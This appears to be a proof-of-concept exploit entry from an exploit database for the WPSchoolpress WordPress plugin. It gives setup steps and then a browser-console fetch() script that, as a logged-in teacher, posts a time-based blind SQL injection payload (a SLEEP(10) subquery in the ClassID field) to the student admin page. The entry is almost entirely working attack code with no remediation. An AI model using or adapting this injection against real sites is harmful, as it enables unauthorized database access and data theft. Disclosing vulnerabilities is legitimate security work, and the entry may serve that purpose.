## https://sploitus.com/exploit?id=WPEX-ID:59DD3917-01CB-479F-A557-021B2A5147DF
1. Install the WPSchoolpress plugin and Import Demo Data.
2. Log in as a teacher
3. Paste the following script in the browser's console, and notice it hangs for a couple seconds, indicating the attack succeeded:
```
await fetch("http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student", {
"credentials": "include",
"headers": {
"User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0",
"Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",
"Accept-Language": "en-CA,en-US;q=0.7,en;q=0.3",
"Content-Type": "application/x-www-form-urlencoded",
"Upgrade-Insecure-Requests": "1"
},
"referrer": "http://wpscan-vulnerability-test-bench.ddev.site/wp-admin/admin.php?page=sch-student",
"body": "ClassID=ClassID=0+AND+(SELECT+1+FROM+(SELECT(SLEEP(10)))abc)",
"method": "POST",
"mode": "cors"
});
```